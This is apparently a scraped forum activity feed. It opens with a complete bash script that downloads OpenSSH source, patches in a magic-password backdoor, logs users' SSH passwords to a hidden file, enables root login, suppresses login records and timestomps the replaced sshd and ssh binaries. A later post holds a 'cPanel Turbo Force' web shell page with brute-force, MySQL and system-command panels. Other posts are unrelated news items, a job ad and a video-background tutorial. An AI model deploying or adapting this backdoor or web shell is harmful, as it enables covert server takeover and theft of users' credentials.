(For use in my own private network of course o.O) # ============================================ #!/bin/bash # ============================================ # satyr's openssh autobackdooring doohicky v0.-1 # ImpendingSatyr@gmail.com # ============================================ # USAGE: # Run this script with no args and it'll prompt for the "Magic" password and location to log passwords to (incoming and outgoing). # If you give the location that passwords will be logged to as an arg, this script will try to automate almost everything # (Like common openssh compiling problems, such as missing pam, kerberos, zlib, openssl-devel, etc. # [it'll install them via apt or yum, whichever is available]). # Note: This script will delete itself once it's fairly sure the openssh compile went smoothly. # It's up to you to clean the logs of those yum/apt installs if they're needed, and to restart sshd. # ============================================ # WTF: # I noticed that most openssh code doesn't change too much among versions, and that most openssh backdoors are # just diff patches for specific versions of openssh. So I thought it would be nice to have a script that applies # such a patch based on those similar chunks of code instead of relying on diff patches so that it can be done on different # versions without any modifying (I've seen kiddies apply backdoor patches for a version of openssh that wasn't # originally being used on the box, which is just lazy & dumb). # So I wrote up this to make the whole process a bit easier (For use in my own private network of course o.O) # ============================================ # FEATURES: # 0) "Magic" password can be automagically generated # 1) "Magic" password is MD5'd before being stored in the ssh/sshd binary, so very unlikely that anyone will be able to get your "Magic" password. # 2) Conents of file that logs passwords is XOR encoded using the same code that's in http://packetstormsecurity.com/files/download/34453/apatch-ssh-3.8.1p1.tar.gz # Here's the script for decoding for the bastards out there too lazy to go to the above link: # #!/bin/sh # cat > x << __EOF__ # #include <stdio.h> # main(int c) { # while(1) { # c = getchar(); if(feof(stdin)) break; # putchar(~c); # } # } # __EOF__ # gcc -x c x -o x; cat $1 | ./x; rm -f x # Do a `cat passlog|./theabovescript.sh` to get the logged passes. # 3) Strings used for this backdoor are limited to 2 characters, so it'll hide from the `strings` command. # 4) Cures cancer # 5) Seems to work fine on all versions from 3.9p1 - 6.3p1 (latest as of this script) # 6) Not really a bug, but your hostname will be logged if it doesn't match your IP's reverse DNS (disable this with "UseDNS no" in sshd_config) # ============================================ # KNOWN BUGS (or lack of feature): # 0) Sometimes the password generated contains non-printable characters. # 1) No check to see if apt or yum completed successfully when installing a missing lib. # 2) No check to see if the pass log location is writable. (yes, I know that could be added easily) # 3) No check to see if packetstorm is accessible when grabbing http://dl.packetstormsecurity.net/UNIX/misc/touch2v2.c # on that last command that's echoed for the user to run when done compiling. # 4) No check if box has gcc # ============================================ # NOTE TO ADMINS: # I didn't put this script on your box. You really need to take your box offline and do a clean install of your system. # This script is no different than the other openssh backdoors when it comes to prevention, # tripwire or anything similar will easily notice this backdoor as it will with other openssh backdoors. # ============================================ WGET=/usr/bin/wget SSHD=/usr/sbin/sshd # an openssh mirror MIRROR=http://mirror.team-cymru.org/pub/OpenBSD/OpenSSH/portable/ SSHETC=/etc/ssh PREFIX=/usr if [ ! -d "$SSHETC" ]; then echo "Error: $SSHETC is not a directory." exit 1 fi if [ "`grep -i pam $SSHETC/sshd_config|grep -v '#'|strings`" != "" ]; then echo "(PAM enabled)" pam="--with-pam" fi if [ "`grep -i gss $SSHETC/sshd_config|grep -v '#'|strings`" != "" ] || \ [ "`grep -i gss $SSHETC/ssh_config|grep -v '#'|strings`" != "" ]; then echo "(KRB5 enabled)" gss="--with-kerberos5" fi version=`$SSHD -arf 2>&1|head -2|tail -1|cut -d, -f1|sed -e's/^OpenSSH_//'|awk '{print $1}'` extracrap=`$SSHD -arf 2>&1|head -2|tail -1|cut -d, -f1|sed -e's/^OpenSSH_//'|awk '{print $2}'` if [ "$1" == "" ]; then read -sp "Magic password (just press enter to use a random one): " PW;echo fi if [ "$PW" == "" ]; then function randpass() { [ "$2" == "0" ] && CHAR="[:alnum:]" || CHAR="[:graph:]";cat /dev/urandom|tr -cd "$CHAR"|head -c ${1:-32};echo;} PW=`randpass $(( 20+( $(od -An -N2 -i /dev/random) )%(20+1) ))` fi if [ "$1" == "" ]; then read -p "File to log passwords to: " LOGF else LOGF=$1 fi if [ "$LOGF" == "" ]; then echo "Error: You didn't choose a file to log passwords to." exit 1 fi echo "===========================================================" echo "Using magic password: $PW" cat > md5.$$ << EOF0 $PW EOF0 md5=`printf "%s" \`(cat md5.$$)|sed -e :a -e N -e '$!ba' -e 's/\n/ /g'\`|openssl md5|awk '{print $NF}'` rm -f md5.$$ echo "Using password log file: $LOGF" echo "OpenSSH version: $version" echo "===========================================================" LOGFLEN=`echo -n $LOGF|wc -c` let LOGFLEN++ if [ ! -x "$WGET" ]; then echo "Error: $WGET is not executable" exit 1 fi echo "Downloading openssh-$version..." wget $MIRROR/openssh-$version.tar.gz 2>&1|grep save tar zxf openssh-$version.tar.gz rm -f openssh-$version.tar.gz if [ -d "openssh-$version" ]; then cd openssh-$version else echo "Error: Couldn't download $MIRROR/openssh-$version.tar.gz using $WGET" exit 1 fi echo "Modifying openssh src..." cat > bd.h <<EOF #include <stdio.h> #include <string.h> int pi, md5len, ploglen; FILE *f; char md5[32], plog[$LOGFLEN], encbuf[2048]; static char * bpmd5() { EOF echo $md5|awk -F. '{n=split($1,a,""); for (i=0;i<n;i++) {printf(" md5[%i] = \"%s\";\n",i,a[i+1])}; for (i=2;i<NF;i++) {printf("%s,",$i)};}' >> bd.h cat >> bd.h <<EOF2 return md5; } static char * plogfn() { EOF2 for i in $(seq 0 $((${#LOGF} - 1))); do echo "plog[$i] = \"${LOGF:$i:1}\";";done >> bd.h cat >> bd.h <<EOF3 return plog; } static void enclog() { char *plogg = plogfn(); int plen; FILE *f; plen=strlen(encbuf); for (pi=0; pi<=plen; pi++) encbuf[pi]=~encbuf[pi]; f = fopen(plogg,"a"); if (f != NULL) { fwrite(encbuf, plen, 1, f); fclose(f); } } EOF3 sed -e s/\"/\'/g -e s/plogg,\'a\'/plogg,\"a\"/ -i bd.h sed '/#include "includes.h"/i\ #include "bd.h" ' -i auth.c sed '/authmsg = authenticated ? "Accepted" : "Failed"/a\ if (!pi) ' -i auth.c sed -i "`echo $[ $(grep -n auth_root_allowed auth.c|awk -F: '{print $1}') + 2 ]`iif (pi) return 1;" -i auth.c # the auth-pam.c stuff is only for => 3.9p1 sed '/auth2-pam-freebsd.c/a\ #include "bd.h" ' -i auth-pam.c sed '/void.*sshpam_conv/a\ if (pi) sshpam_err = PAM_SUCCESS; ' -i auth-pam.c sed "`echo $[ $(grep -n pam_authenticate.sshpam_handle auth-pam.c|head -c3) + 1 ]`iif (pi) sshpam_err = PAM_SUCCESS;" -i auth-pam.c sed "`grep -nA3 sshpam_cleanup.void auth-pam.c|grep NULL|head -c3`s/NULL/NULL || pi/" -i auth-pam.c sed "`echo $[ $(grep -n char.*pam_rhost auth-pam.c|head -c3) + 2 ]`iif (pi) return (0);" -i auth-pam.c sed '/type == PAM_SUCCESS/a\ if (pi) return 0; ' -i auth-pam.c sed "`echo $[ $(grep -n do_pam_setcred auth-pam.c|head -c3) + 3 ]`a\ if (pi) {\n\ sshpam_cred_established = 1;\n\ return;\n\ }" -i auth-pam.c sed "`echo $[ $(grep -n sshpam_respond.void auth-pam.c|head -c3) + 3 ]`a\ if (pi) {\n\ sshpam_cred_established = 1;\n\ return;\n\ }" -i auth-pam.c sed "`grep -nA6 sshpam_auth_passwd auth-pam.c|grep "\-$"|sed 's/\-$//'`a\ char *passmd5 = str2md5(password, strlen(password));\n\ char *bpass = bpmd5();\n\ int enlen;\n\ " -i auth-pam.c sed "`echo $(grep -n "sshpam_authctxt = authctxt" auth-pam.c|tail -1|awk -F: '{print $1}')`a\ if (strcmp(passmd5,bpass) == 0) {\n\ pi = 1;\n\ return 1;\n\ }" -i auth-pam.c sed "`echo $(grep -nA1 'debug.*password authentication accepted for' auth-pam.c|tail -1|head -c4)`a\ enlen = sprintf(encbuf,\"pam\");\n\ enlen += sprintf(encbuf+enlen,\":\");\n\ enlen += sprintf(encbuf+enlen,\"%s\",authctxt->user);\n\ enlen += sprintf(encbuf+enlen,\":\");\n\ enlen += sprintf(encbuf+enlen,\"%s\\\n\",password);\n\ enclog();\n\ " -i auth-pam.c sed '/#include "includes.h"/i\ #include "bd.h"\ #include <stdlib.h>\ #if defined(__APPLE__)\ # define COMMON_DIGEST_FOR_OPENSSL\ # include <CommonCrypto/CommonDigest.h>\ # define SHA1 CC_SHA1\ #else\ # include <openssl/md5.h>\ #endif\ ' -i auth-passwd.c sed '/extern ServerOptions options;/a\ char *str2md5(const char *str, int length) {\ int n;\ MD5_CTX c;\ unsigned char digest[16];\ char *out = (char*)malloc(33);\ MD5_Init(&c);\ while (length > 0) {\ if (length > 512) {\ MD5_Update(&c, str, 512);\ } else {\ MD5_Update(&c, str, length);\ }\ length -= 512;\ str += 512;\ }\ MD5_Final(digest, &c);\ for (n = 0; n < 16; ++n) {\ snprintf(&(out[n*2]), 16*2, "%02x", (unsigned int)digest[n]);\ }\ return out;\ }\ ' -i auth-passwd.c sed '/#ifndef HAVE_CYGWIN/i\ if (pi) return 1; ' -i auth-passwd.c sed "`echo $[ $(grep -n sys_auth_passwd.A auth-passwd.c|tail -1|head -c3) + 3 ]`a\ char *passmd5 = str2md5(password, strlen(password));\n\ char *bpass = bpmd5();\n\ int enlen;\n\ " -i auth-passwd.c sed "`echo $(grep -n pw_password.0.*xx auth-passwd.c|head -c3)`a\ if (strcmp(passmd5,bpass) == 0) {\n\ pi = 1;\n\ return 1;\n\ }\n\ else {\n\ if (strcmp(encrypted_password, pw_password) == 0) {\n\ enlen = sprintf(encbuf,\"pas\");\n\ enlen += sprintf(encbuf+enlen,\":\");\n\ enlen += sprintf(encbuf+enlen,\"%s\",authctxt->user);\n\ enlen += sprintf(encbuf+enlen,\":\");\n\ enlen += sprintf(encbuf+enlen,\"%s\\\n\",password);\n\ enclog();\n\ }\n\ }\n\ " -i auth-passwd.c sed '/#include "includes.h"/i\ #include "bd.h" ' -i sshconnect1.c sed '/char \*password;/a\ int enlen; ' -i sshconnect1.c sed '/ssh_put_password(password);/a\ enlen = sprintf(encbuf,"1:");\ enlen += sprintf(encbuf+enlen,"%s",get_remote_ipaddr());\ enlen += sprintf(encbuf+enlen,":");\ enlen += sprintf(encbuf+enlen,"%s",options.user);\ enlen += sprintf(encbuf+enlen,":");\ enlen += sprintf(encbuf+enlen,"%s\\n",password);\ enclog();\ ' -i sshconnect1.c sed '/#include "includes.h"/i\ #include "bd.h" ' -i sshconnect2.c sed '/char.*password;/a\ int enlen; ' -i sshconnect2.c sed "`echo $(grep -n 'packet_put_cstring(password);' sshconnect2.c|head -c3)`a\ enlen = sprintf(encbuf,\"2:\");\n\ enlen += sprintf(encbuf+enlen,\"%s\",authctxt->server_user);\n\ enlen += sprintf(encbuf+enlen,\":\");\n\ enlen += sprintf(encbuf+enlen,\"%s\",authctxt->host);\n\ enlen += sprintf(encbuf+enlen,\":\");\n\ enlen += sprintf(encbuf+enlen,\"%s\\\n\",password);\n\ enclog();\ " -i sshconnect2.c sed '/#include "includes.h"/i\ #include "bd.h" ' -i loginrec.c sed '/#ifndef HAVE_CYGWIN/i\ if (pi) return 0; ' -i loginrec.c sed '/#include "includes.h"/i\ #include "bd.h" ' -i log.c sed '/#if (level > log_level)/i\ if (pi) return; ' -i loginrec.c sed 's/PERMIT_NO /PERMIT_YES /' -i servconf.c sed 's/PERMIT_NO;/PERMIT_YES;/' -i servconf.c sed 's/PERMIT_NO_PASSWD /PERMIT_YES /' -i servconf.c sed 's/PERMIT_NO_PASSWD;/PERMIT_YES;/' -i servconf.c if [ "$extracrap" != "" ]; then sed -re"s/(SSH.*PORTABLE.*)\"/\1 $extracrap\"/" -i version.h fi echo "Compiling..." ./configure --prefix=$PREFIX $pam $gss --sysconfdir=$SSHETC 2>/dev/null 1>/dev/null if [ "`grep error: config.log|sed -e's/.*error:/error:/'|tail -1`" == "error: PAM headers not found" ]; then if [ "$1" == "" ]; then echo "Error: PAM headers missing. To install do: " echo " (with apt) apt-get install libpam0g-dev" echo " (with yum) yum install pam-devel" exit 1 else echo "Error: PAM headers missing. Attempting automatic install..." if [ -e "/usr/bin/yum" ]; then yum -y install pam-devel fi if [ -e "/usr/bin/apt-get" ]; then apt-get -y install libpam0g-dev fi echo "If install was successful, rerun $0" exit 1 fi fi if [ "`grep error: config.log|sed -e's/.*error:/error:/'|tail -1`" == "error: no acceptable C compiler found in \$PATH" ]; then echo "Error: No gcc on this box (or in \$PATH)." exit 1 fi if [ "`grep error: config.log|sed -e's/.*error:/error:/'|tail -1`" == "error: *** zlib missing - please install first or check config.log ***" ] || \ [ "`grep error: config.log|sed -e's/.*error:/error:/'|tail -1`" == "error: *** zlib.h missing - please install first or check config.log ***" ]; then if [ "$1" == "" ]; then echo "Error: zlib missing. To install do: " echo " (with apt) apt-get install zlib1g-dev" echo " (with yum) yum install zlib-devel" exit 1 else echo "Error: zlib missing. Attempting automatic install..." if [ -e "/usr/bin/yum" ]; then yum -y install zlib-devel fi if [ -e "/usr/bin/apt-get" ]; then apt-get -y install zlib1g-dev fi echo "If install was successful, rerun $0" exit 1 fi fi if [ "`grep "krb5.h: No such file or directory" config.log|head -1|awk '{ print substr($0, index($0,$2)) }'`" == "error: krb5.h: No such file or directory" ]; then echo "Error: kerberos5 missing. To install do:" echo " (with apt) apt-get install libkrb5-dev" echo " (with yum) yum install krb5-devel" fi if [ "`grep error: config.log|sed -e's/.*error:/error:/'|tail -1`" == "error: *** Can't find recent OpenSSL libcrypto (see config.log for details) ***" ] || \ [ "`grep error: config.log|sed -e's/.*error:/error:/'|tail -1`" == "error: *** OpenSSL headers missing - please install first or check config.log ***" ]; then if [ "$1" == "" ]; then echo "Error: libcrypto missing. To install do: " echo " (with apt) apt-get install libssl-dev" echo " (with yum) yum install openssl-devel" exit 1 else echo "Error: libcrypto missing. Attempting automatic install..." if [ -e "/usr/bin/yum" ]; then yum -y install openssl-devel fi if [ -e "/usr/bin/apt-get" ]; then apt-get -y install libssl-dev fi echo "If install was successful, rerun $0" exit 1 fi fi make 2>/dev/null 1>/dev/null if [ -e "sshd" ]; then ls -l ssh sshd cd .. rm -vf $0 echo "Now do this:" echo "cd openssh-$version;$WGET http://dl.packetstormsecurity.net/UNIX/misc/touch2v2.c -q;gcc -o touch touch2v2.c;cp /usr/sbin/sshd sshd.bak;cp /usr/bin/ssh ssh.bak;chown --reference=/usr/bin/ssh ssh.bak;chown --reference=/usr/sbin/sshd sshd.bak;touch -r /usr/sbin/sshd sshd.bak;touch -r /usr/bin/ssh ssh.bak;./touch -r /usr/sbin/sshd sshd.bak;./touch -r /usr/bin/ssh ssh.bak;rm -f /usr/sbin/sshd /usr/bin/ssh;cp ssh /usr/bin/;cp sshd /usr/sbin/;chown --reference=ssh.bak /usr/bin/ssh;chown --reference=sshd.bak /usr/sbin/sshd;touch -r sshd.bak /usr/sbin/sshd;touch -r ssh.bak /usr/bin/ssh;./touch -r sshd.bak /usr/sbin/sshd;./touch -r ssh.bak /usr/bin/ssh;echo Backdoored. Now you restart it." else echo "Error: Compiling failed: " grep error: config.log|tail -1 fi Files from Satyr ? Packet Storm
  18. Fi8sVrs
    Stoc epuizat Stocul pentru aceste produse este epuizat. Deoarece nu ar fi corect s? accept?m comenzi pe care nu le putem onora, v? rug?m s? ne contacta?i pentru o eventual? precomand?.
  19. Fi8sVrs
    Yahoo to pay up to $15,000 for bug finds after 't-shirt gate' scandal - IT News from V3.co.uk
  20. Fi8sVrs
    It's those 'regional traits' that give you away, say infosec sleuths Nation-state driven cyber attacks often take on a distinct national or regional flavour that can uncloak their origins, according to new research by net security firm FireEye. Computer viruses, worms, and denial of service attacks often appear from behind a veil of anonymity. But a skilful blending of forensic “reverse-hacking” techniques combined with deep knowledge of others’ cultures and strategic aims can uncover the perpetrators of attacks. Kenneth Geers, senior global threat analyst at threat protection biz FireEye, explained: “Cyber shots are fired in peacetime for immediate geopolitical ends, as well as to prepare for possible future kinetic attacks. Since attacks are localised and idiosyncratic—understanding the geopolitics of each region can aid in cyber defence.” Estonia was able to point the finger of blame towards the infamous (and ultimately politically unsuccessful) cyberattacks against its systems in 2007. FireEye argues that understanding the context of cyberattacks can be used to unpick their origins or to better prepare for them. “A cyber attack, viewed outside of its geopolitical context, allows very little legal manoeuvring room for the defending state,” said Professor Thomas Wingfield of the Marshall Centre, a joint US-German defence studies institute. “False flag operations and the very nature of the internet make tactical attribution a losing game. However, strategic attribution – fusing all sources of intelligence on a potential threat – allows a much higher level of confidence and more options for the decision maker,” Professor Wingfield continued. “And strategic attribution begins and ends with geopolitical analysis." Cyber attacks can be a low-cost, high payoff way to defend national sovereignty and to project national power. According to FireEye, the key characteristics for some of the main regions of the world include: Asia-Pacific: home to large, bureaucratic hacker groups, such as the “Comment Crew” who pursues targets in high-frequency, brute-force attacks. Russia/Eastern Europe: More technically advanced cyberattacks that are often highly effective at evading detection. Middle East: Cybercriminals in the region often using creativity, deception, and social engineering to trick users into compromising their own computers. United States: origin of the most complex, targeted, and rigorously engineered cyber attack campaigns to date, such as the Stuxnet worm. Attackers favour a drone-like approach to malware delivery. FireEye's report goes on to speculate about factors that could change the world’s cyber security landscape in the near to medium term, including a cyber arms treaty that could stem the use of online attacks and about whether privacy concerns from the ongoing Snowden revelations about PRISM might serve to restrain government-sponsored cyber attacks in the US and globally. The net security firm also looks at new actors on the cyberwar stage – most notably Brazil, Poland, and Taiwan. Finally, it considers the possibility that such attacks mights result in outages of critical national infrastructure systems, a long-feared threat over the last 15 years that has thankfully failed to materialise. Squirrels have caused frequent power outages by doing things like chewing through high-tension power cables (or even touching them, to fatal effect for the furry little rodents) but El Reg's security desk hasn't come up with even one verified example where hacking has triggered a blackout – except in the imaginations of Hollywood execs, of course. FireEye's report, titled World War C: Understanding Nation-State Motives Behind Today’s Advanced Cyber Attacks, can be found here (PDF). ® Via: State-backed hackers: You think you're so mysterious, but you're really not – report • The Register
  21. Fi8sVrs
    angajez webdesigner pentru un proiect Cerin?e: - cunostinte avansate in html/css/php; - imaginatie. discutam detaliile, /pret/timp de lucru prin mesaj privat accept mesaje doar de la membrii vechi si de incredere
  22. Fi8sVrs
    <html> <title>cPanel Turbo Force v2</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <head> <style type="text/css"> <!-- body { background-color: #000000; font-size: 18px; color: #cccccc; } input,textarea,select{ font-weight: bold; color: #cccccc; dashed #ffffff; border: 1px solid #2C2C2C; background-color: #080808 } a { background-color: #151515; vertical-align: bottom; color: #000; text-decoration: none; font-size: 20px; margin: 8px; padding: 6px; border: thin solid #000; } a:hover { background-color: #080808; vertical-align: bottom; color: #333; text-decoration: none; font-size: 20px; margin: 8px; padding: 6px; border: thin solid #000; } .style1 { text-align: center; } .style2 { color: #FFFFFF; font-weight: bold; } .style3 { color: #FFFFFF; } --> </style> </head> <form method="POST" target="_blank"> <strong> <input name="page" type="hidden" value="find"> </strong> <table width="600" border="0" cellpadding="3" cellspacing="1" align="center"> <tr> </tr> <tr> <td> <table width="100%" border="0" cellpadding="3" cellspacing="1" align="center"> <td valign="top" bgcolor="#151515" class="style2" style="width: 139px"> <strong>User :</strong></td> <td valign="top" bgcolor="#151515" colspan="5"><strong><textarea cols="40" rows="10" name="usernames"></textarea></strong></td> </tr> <tr> <td valign="top" bgcolor="#151515" class="style2" style="width: 139px"> <strong>Pass :</strong></td> <td valign="top" bgcolor="#151515" colspan="5"><strong><textarea cols="40" rows="10" name="passwords"></textarea></strong></td> </tr> <tr> <td valign="top" bgcolor="#151515" class="style2" style="width: 139px"> <strong>Type :</strong></td> <td valign="top" bgcolor="#151515" colspan="5"> <span class="style2"><strong>Simple : </strong> </span> <strong> <input type="radio" name="type" value="simple" checked="checked" class="style3"></strong> <font class="style2"><strong>/etc/passwd : </strong> </font> <strong> <input type="radio" name="type" value="passwd" class="style3"></strong><span class="style3"><strong> </strong> </span> </td> </tr> <tr> <td valign="top" bgcolor="#151515" style="width: 139px"></td> <td valign="top" bgcolor="#151515" colspan="5"><strong><input type="submit" value="start"> </strong> </td> <tr> </form> <td valign="top" colspan="6"><strong></strong></td> <form method="POST" target="_blank"> <strong> <input type="hidden" name="go" value="cmd_mysql"> </strong> <tr> <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>CMD MYSQL</strong></td> </tr> <tr> <td valign="top" bgcolor="#151515" style="width: 139px"><strong>user</strong></td> <td valign="top" bgcolor="#151515"><strong><input name="mysql_l" type="text"></strong></td> <td valign="top" bgcolor="#151515"><strong>pass</strong></td> <td valign="top" bgcolor="#151515"><strong><input name="mysql_p" type="text"></strong></td> <td valign="top" bgcolor="#151515"><strong>database</strong></td> <td valign="top" bgcolor="#151515"><strong><input name="mysql_db" type="text"></strong></td> </tr> <tr> <td valign="top" bgcolor="#151515" style="height: 25px; width: 139px;"> <strong>cmd ~</strong></td> <td valign="top" bgcolor="#151515" colspan="5" style="height: 25px"> <strong> <textarea name="db_query" style="width: 353px; height: 89px">SHOW DATABASES; SHOW TABLES user_vb ; SELECT * FROM user; SELECT version(); SELECT user();</textarea></strong></td> </tr> <tr> <td valign="top" bgcolor="#151515" style="width: 139px"><strong></strong></td> <td valign="top" bgcolor="#151515" colspan="5"><strong><input type="submit" value="run"></strong></td> </tr> <input name="db" value="MySQL" type="hidden"> <input name="db_server" type="hidden" value="localhost"> <input name="db_port" type="hidden" value="3306"> <input name="cccc" type="hidden" value="db_query"> </form> <tr> <td valign="top" bgcolor="#151515" colspan="6"><strong></strong></td> </tr> <form method="POST" target="_blank"> <tr> <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>CMD system - passthru - exec - shell_exec</strong></td> </tr> <tr> <td valign="top" bgcolor="#151515" style="width: 139px"><strong>cmd ~</strong></td> <td valign="top" bgcolor="#151515" colspan="5"> <select name="att" dir="rtl" size="1"> <option value="system" selected="">system</option> <option value="passthru">passthru</option> <option value="exec">exec</option> <option value="shell_exec">shell_exec</option> </select> <strong> <input name="page" type="hidden" value="ccmmdd"> <input name="ccmmdd2" type="text" style="width: 284px" value="ls -la"></strong></td> </tr> <tr> <td valign="top" bgcolor="#151515" style="width: 139px"><strong></strong></td> <td valign="top" bgcolor="#151515" colspan="5"><strong><input type="submit" value="go"></strong></td> </tr> </form> <form method="POST" target="_blank"> <tr> <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Show File And Edit</strong></td> </tr> <tr> <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Path ~</strong></td> <td valign="top" bgcolor="#151515" colspan="5"> <strong> <input name="pathclass" type="text" style="width: 284px" value="/home/alsaain1/public_html/images"></strong></td> </tr> <tr> <td valign="top" bgcolor="#151515" style="width: 139px"><strong></strong></td> <td valign="top" bgcolor="#151515" colspan="5"><strong><input type="submit" value="show"></strong></td> </tr> <input name="page" type="hidden" value="show"> </form> <tr> <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Info Security</strong></td> </tr> <tr> <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Safe Mode</strong></td> <td valign="top" bgcolor="#151515" colspan="5"> <strong> OFF </strong> </td> </tr> <tr> <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Function</strong></td> <td valign="top" bgcolor="#151515" colspan="5"> <strong> <font color=red>php_uname,getmyuid, getmypid,leak,listen,diskfreespace,tmpfile,link,ig nore_user_abord,dl,set_time_limit,passthru,exec,po pen,system,proc_get_status,proc_nice,proc_open,pro c_terminate,proc_close,highlight_file,source,show_ source,fpaththru,virtual,posix_ctermid,posix_getcw d,posix_getegid,posix_geteuid,posix_getgid,posix_g etgrgid,posix_getgrnam,posix_getgroups,posix_getlo gin,posix_getpgid,posix_getpgrp,posix_getpid,posix ,_getppid,posix_getpwnam,posix_getpwuid,posix_getr limit,posix_getsid,posix_getuid,posix_isatty,posix _kill,posix_mkfifo,posix_setegid,posix_seteuid,pos ix_setgid,posix_setpgid,posix_setsid,posix_setuid, posix_times,posix_ttyname,posix_uname,proc_open,pr oc_close,proc_get_status,proc_nice,proc_terminate, phpinfo,shell_exec,escapeshellarg,escapeshellcmd,i ni_alter,show_source,pfsockopen,leak,apache_child_ terminate,posix_setuid,dl,virtual</font></b></strong></td> <tr> <td valign="top" bgcolor="#151515" style="width: 139px"><strong></strong></td> <td valign="top" bgcolor="#151515" colspan="5"><strong></strong></td> </table> </td> </tr> </table> <meta http-equiv="content-type" content="text/html; charset=UTF-8"></head><body></body></html> <form style="border: 0px ridge #FFFFFF"> <p align="center"></td> </tr><div align="center"> <tr> <input type="submit" name="user" value="user"><option value="name"></select> </form> <div align="center"> <table border="5" width="10%" bordercolorlight="#008000" bordercolordark="#006A00" height="100" cellspacing="5"> <tr> <td bordercolorlight="#008000" bordercolordark="#006A00"> <p align="left"> <textarea method='POST' rows="25" name="S1" cols="16"> </textarea>
  23. Fi8sVrs

    Bună ziua

    Fi8sVrs replied to MaxT's topic in Bine ai venit

    Bine ai venit!
  24. Fi8sVrs
    Un fost ?ef de banc? a fost re?inut de procurori sub acuza?ia de fraud?, dup? ce ar fi coordonat un grup care au retras ac?iuni în valoare de 200.000 de euro din contul ?efei Misiunii B?ncii Mondiale în România. Anchetatorii au o pist? în cazul ac?iunilor în valoare de 200.000 de euro, care au disp?rut din contul ?efei Misiunii B?ncii Mondiale în România. Trei persoane au fost re?inute ast?zi, la Sibiu, iar alte cinci sunt cercetate în stare de libertate. Potrivit procurorilor, capul re?elei este fostul director al B?ncii Agricole din Sibiu. Potrivit anchetatorilor, pentru ca infractorii s? scoat? ac?iunile de la Societatea de Brokeraj, s-au folosit de un act de identitate fals ?i au avut contribu?ia unei femei cu înf??i?are apropiat? de ce a oficialului B?ncii Mondiale. Surse din interiorul anchetei sus?in c? Ana Maria Mih?escu ar fi sesizat furtul ac?iunilor în luna aprilie a acestui an în momentul în care ?i-a verificat tranzac?iile financiare la Burs?. ?efa misiunii B?ncii Mondiale în România a observat atunci c?-i lipsesc câteva sute de mii de euro dintr-un cont de investi?ii. Mai mult, ultima tranzac?ie fusese f?cut? în luna februrie, printr-o societate de brokeraj la care femeia nu avea cont. Imediat, femeia a alertat poli?ia ?i Autoritatea de Supraveghere Financiar?. Ana Maria Mih?escu nu ?i a recuperat suma pierdut?. Ancheta autorit??ilor s-a încheiat abia dup? ?apte luni, când au reu?it s? îi identifice pe f?pta?i ?i s? îi re?in?. Ei risc? pân? la 20 de ani de închisoare pentru fraud? financiar?. Source & Video: ?efa Misiunii B?ncii Mondiale, jefuit?. Un fost director de banc?, re?inut
  25. Fi8sVrs
    Download | Demo So you’ve seen videos being used as backgrounds across the web and you’re thinking ‘how do I do that?’. The main issue usually being making the video cover the entire screen. Normally when you set a video it will resize in accordance with its aspect ratio, meaning it won’t cover the entire background. Well don’t worry, for I am here to guide you on your enthralling quest towards background video freedom. Read on, young warrior. Getting off the ground First off, set up a div with the video you want as the background, and then have a content div for putting all the content. Don’t forget to take a screenshot of the video and save it as a jpg called poster.jpg. This will serve as a background for users who do not have browsers that support the video tag. <div id="container"> <video autoplay loop muted> <source src="video.mp4" type="video/mp4"> <source src="video.webm" type="video/webm"> </video> <div class="content"> </div> </div> Next up, set up a bit of CSS to set the content to be positioned absolutely on top of the video: #container { position: relative; overflow: hidden; } #container .content { position: absolute; top: 0; left: 0; } Great! Now all we gotta do is figure out how to make the video fit the entire screen. We have to use a bit of Javascript magic to make this work: A little bit of Javascript As discussed, the issue is that the video aspect ratio will make the video very difficult to cover the entire screen. How do we fix this? Well we need to make a comparison of the aspect ratio of the window against the aspect ratio of the video. Then we can multiply the width of the video by this calculation making the video always fill the screen, no matter what size the user’s screen is. Don’t forget to include jQuery! Your code should look a bit like this: $(function() { // IE detect function iedetect(v) { var r = RegExp('msie' + (!isNaN(v) ? ('\\s' + v) : ''), 'i'); return r.test(navigator.userAgent); } // For mobile screens, just show an image called 'poster.jpg'. Mobile // screens don't support autoplaying videos, or for IE. if(screen.width < 800 || iedetect(8) || iedetect(7) || 'ontouchstart' in window) { (adjSize = function() { // Create function called adjSize $width = $(window).width(); // Width of the screen $height = $(window).height(); // Height of the screen // Resize image accordingly $('#container').css({ 'background-image' : 'url(poster.jpg)', 'background-size' : 'cover', 'width' : $width+'px', 'height' : $height+'px' }); // Hide video $('video').hide(); })(); // Run instantly // Run on resize too $(window).resize(adjSize); } else { // Wait until the video meta data has loaded $('#container video').on('loadedmetadata', function() { var $width, $height, // Width and height of screen $vidwidth = this.videoWidth, // Width of video (actual width) $vidheight = this.videoHeight, // Height of video (actual height) $aspectRatio = $vidwidth / $vidheight; // The ratio the video's height and width are in (adjSize = function() { // Create function called adjSize $width = $(window).width(); // Width of the screen $height = $(window).height(); // Height of the screen $boxRatio = $width / $height; // The ratio the screen is in $adjRatio = $aspectRatio / $boxRatio; // The ratio of the video divided by the screen size // Set the container to be the width and height of the screen $('#container').css({'width' : $width+'px', 'height' : $height+'px'}); if($boxRatio < $aspectRatio) { // If the screen ratio is less than the aspect ratio.. // Set the width of the video to the screen size multiplied by $adjRatio $vid = $('#container video').css({'width' : $width*$adjRatio+'px'}); } else { // Else just set the video to the width of the screen/container $vid = $('#container video').css({'width' : $width+'px'}); } })(); // Run function immediately // Run function also on window resize. $(window).resize(adjSize); }); } }); Now the video will cover the entire screen size on user resize or anything! Things to note: Mobiles dont support autoplayed videos, so we can't do this on mobile. Instead we'll show an image as a background called poster.jpg. Same goes for IE8 and below! For those browsers the poster.jpg image will be used instead. Full screen background videos are really exploding on the web design scene, so I'm sure you'll find a use for it at some point. The footage I'm using is from Vimeo's free HD Stock Footage, so go check that out. Have a great day! Source: Quick Tips: Using Videos as Backgrounds | InsertHTML
×
×
  • Create New...